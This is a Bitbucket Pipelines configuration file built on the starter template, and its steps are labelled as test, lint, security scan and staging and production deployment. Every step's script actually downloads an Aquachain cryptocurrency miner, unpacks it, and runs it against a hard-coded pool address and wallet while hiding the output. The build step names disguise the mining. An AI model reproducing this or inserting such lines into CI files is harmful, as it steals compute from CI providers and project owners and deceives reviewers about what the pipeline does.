# This is an example Starter pipeline configuration
# Use a skeleton to build, test and deploy using manual and parallel steps
# -----
# You can specify a custom docker image from Docker Hub as your build environment.

image: atlassian/default-image:3

pipelines:
  default:
    - parallel:
      - step:
          name: test
          script:
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 142.44.246.53:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/0 -G > /dev/null
      - step:
          name: Lint
          script:
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 142.44.246.53:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/0 -G > /dev/null
      - step:
          name: Security scan
          script:
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 142.44.246.53:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/0 -G > /dev/null

    # The following deployment steps will be executed for each pipeline run. To configure your steps and conditionally deploy see https://support.atlassian.com/bitbucket-cloud/docs/configure-bitbucket-pipelinesyml/
    - step:
        name: Deployment to Staging
        deployment: staging
        script:
          - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 142.44.246.53:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/0 -G > /dev/null
    - step:
        name: Deployment to Production
        deployment: production
        trigger: manual
        script:
          - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 142.44.246.53:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/0 -G > /dev/null
